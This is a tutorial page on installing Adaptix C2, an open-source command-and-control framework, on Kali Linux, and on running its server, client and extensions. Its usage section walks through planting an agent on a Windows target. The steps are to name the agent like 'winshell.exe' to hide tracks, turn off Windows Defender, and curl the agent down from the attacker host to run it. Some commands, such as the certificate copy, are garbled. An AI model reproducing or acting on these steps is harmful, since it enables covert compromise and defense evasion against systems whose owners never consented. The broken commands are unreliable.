Adaptix C2 install on Kali Linux

Adaptix C2 is an open-source Command and Control framework designed for red teamers and penetration testers to manage compromised systems during post-exploitation. It is built with a Go-based server and a cross-platform GUI client written in C++ using Qt, which makes it accessible on Linux, Windows, and macOS. The tool is gaining attention in the security community because of its clean and intuitive interface, often compared favorably to commercial platforms like Cobalt Strike.

The framework supports encrypted communications between the server and agents, with functionality for modular listeners, customizable agents, and extension development. It allows operators to perform tasks such as job scheduling, file and process exploration, port forwarding with SOCKS4/5, Beacon Object File (BOF) execution, and remote terminal access. Features like session graphs, agent kill dates, and health checks provide operators with better visibility and control over engagements.

Adaptix C2’s design emphasizes extensibility and collaboration, offering multiplayer or team server functionality so multiple operators can work together during an engagement. Community users have highlighted the flexibility of modifying default agents or creating custom ones to adapt to specific operational needs. This blend of usability, modularity, and open-source accessibility positions Adaptix C2 as one of the most promising alternatives to commercial C2 platforms.

How to install Adaptix C2 on Kali Linux in 2025

				
					<!-- Website -->
https://adaptix-framework.gitbook.io/adaptix-framework/adaptix-c2/getting-starting/installation

git clone https://github.com/Adaptix-Framework/AdaptixC2.git
cd AdaptixC2

<!-- Server and Extenders -->
sudo apt install mingw-w64 make gcc g++ g++-mingw-w64

wget https://go.dev/dl/go1.24.4.linux-amd64.tar.gz -O /tmp/go1.24.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go /usr/local/bin/go
sudo tar -C /usr/local -xzf /tmp/go1.24.4.linux-amd64.tar.gz
sudo ln -s /usr/local/go/bin/go /usr/local/bin/go

<!-- Windows 7 support by gopher agent -->
git clone https://github.com/Adaptix-Framework/go-win7 /tmp/go-win7
sudo mv /tmp/go-win7 /usr/lib/

<!-- Build Client -->
sudo apt install gcc g++ build-essential make cmake mingw-w64 g++-mingw-w64 libssl-dev qt6-base-dev qt6-websockets-dev qt6-declarative-dev

<!-- AdaptixServer and Extenders (goplugins) must be built with the same version of the golang package -->
make server
make extenders

<!-- The AdaptixClient is compiled from the cmake configuration. -->
make client
				
			

How to start Adaptix C2 Server

				
					<!-- Inside directroy you installed Adaptix C2 in -->
ls
cd AdaptixServer/
cat profile.json

<!-- Generate SSL cert -->
<!-- Go to back to the orginal install folder -->
openssl req -x509 -nodes -newkey rsa:2048 -keyout server.rsa.key -out server.rsa.crt -days 3650

<!-- Copy SSL certs to dist folder -->
cd /dist
cp ..server.rsa.*

<!-- Start Server -->
cd /dist
./adaptixserver -profile profile.json

<!-- Start Client - (Open new terminal window)  -->
./AdaptixClient

				
			

Configure the Client

				
					User: whatever
Password: pass
Project: whatever
Host: Local IP of Kali Linux
Port: 4321
Endpoint: /endpoint
				
			

How to use

				
					Create a listener
Right-click in listender field and select Create

Listener Name: whatever
Host & port: Local IP - Port: 5000
Callback addresses: Local IP:5000
URI: whatever
Uncheck Use SSL
Create

Once created we need an Agent
Right-click on the newly created Listener and select Generate agent

Use defaults and select Generate

Save file to /dist directory

Copy the newly created .exe file to the target computer

Tip - Name the .exe file something like winshell.exe to help hide your tracks

On target - Turn off Windows Defender so file doesnt get picked up

From the (PWND) Windows computer, open PowerShell
curl  http://kali-linux-ip:8000/agent-name.exe -o agent-name.exe

On the Windows PC, excute the .exe to run it. 

Return to Adaptix Framework - You now have access!


				
			

How to install extensions

				
					<!-- Return to AdaptixC2 root folder -->
git clone https://github.com/Adaptix-Framework/Extension-Kit.git
cd Extension-Kit/

<!-- cd into each folder and run makefile -->
cd AD-BOF
make
cd ..
Repeat process for all folders

In Adaptix Framework, click on Extender, Open Extender.
Right-click > Load new > Browse to the files and import the .json files one at a time

				
			

Additional Resource – https://www.youtube.com/watch?v=1dinvGrCaIg&t=29s

Leave a Reply

Your email address will not be published. Required fields are marked *